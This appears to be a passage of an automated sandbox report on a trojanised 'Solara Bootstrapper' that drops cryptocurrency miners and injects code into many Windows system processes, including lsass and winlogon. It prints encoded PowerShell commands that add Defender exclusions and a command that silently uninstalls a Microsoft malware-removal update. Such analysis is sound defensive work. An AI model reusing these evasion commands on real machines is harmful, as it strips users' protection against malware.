Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 217AF8C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 226D8930000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13E5E930000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F844120000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27234C50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28543540000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 2B684340000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2364AE20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 19AF2590000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 232885B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C3732E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1EB58D40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 29DD77B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 19A497D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F43C510000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1AB883E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1AB88E70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: PID: 1028 base: 3050000 value: 4D
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeThread register set: target process: 7504Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeThread register set: target process: 7464
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1E858950000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1E858980000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 140ADFC0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 195DD590000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1160CB90000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 257E1070000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2652E0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 254A27C0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24B87DA0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 205FB3C0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A205670000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 18EC1F30000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26238950000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2786E560000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1611FF70000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27C0F350000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B279570000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E70A460000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22D13110000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22C8C580000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2825F1D0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2AA5D9C0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20BAEC90000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2DC1B0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C782530000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: A60000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24066EB0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A3FD9A0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 181CEDB0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A142790000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 195B6F30000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DAD0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973830000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DBFA550000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D76CCC0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A239D90000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17CFA390000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FB7270000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DF53B50000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 164E88A0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25177B50000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28D5D340000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 24EB5E10000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F153C20000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D241D40000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 16FADAD0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 20E03070000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15204DB0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 3050000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 175C5280000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 1CE76AA0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22EF1B30000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34B0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 261DE4D0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 22E74470000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1B1A9D00000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 217AF8C0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 226D8930000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13E5E930000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F844120000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27234C50000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28543540000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 2B684340000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2364AE20000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 19AF2590000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 232885B0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C3732E0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1EB58D40000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 29DD77B0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 19A497D0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F43C510000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1AB883E0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1AB88E70000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F43C220000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F43C230000
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA="Jump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeProcess created: C:\Users\user\AppData\Local\Temp\kx new.exe "C:\Users\user\AppData\Local\Temp\kx new.exe" Jump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeProcess created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA="Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess created: C:\Users\user\AppData\Local\Temp\Kawpow new.exe "C:\Users\user\AppData\Local\Temp\Kawpow new.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess created: C:\Users\user\AppData\Local\Temp\xmr new.exe "C:\Users\user\AppData\Local\Temp\xmr new.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagkadqbiacmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajahyacqb3acmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajagqabqb4acmapgagac0argbvahiaywblacaapaajagiazgbpacmapga="
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagqacab0acmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajageacab0acmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajag4aagbnacmapgagac0argbvahiaywblacaapaajaggabgbxacmapga="
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagkadqbiacmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajahyacqb3acmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajagqabqb4acmapgagac0argbvahiaywblacaapaajagiazgbpacmapga="Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagqacab0acmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajageacab0acmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajag4aagbnacmapgagac0argbvahiaywblacaapaajaggabgbxacmapga="Jump to behavior
Source: C:\Windows\System32\dialer.exeCode function: 46_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,46_2_0000000140001B54
Source: C:\Windows\System32\dialer.exeCode function: 46_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,46_2_0000000140001B54
Source: C:\Windows\System32\conhost.exeCode function: 2_2_0000019A497E36F0 cpuid 2_2_0000019A497E36F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
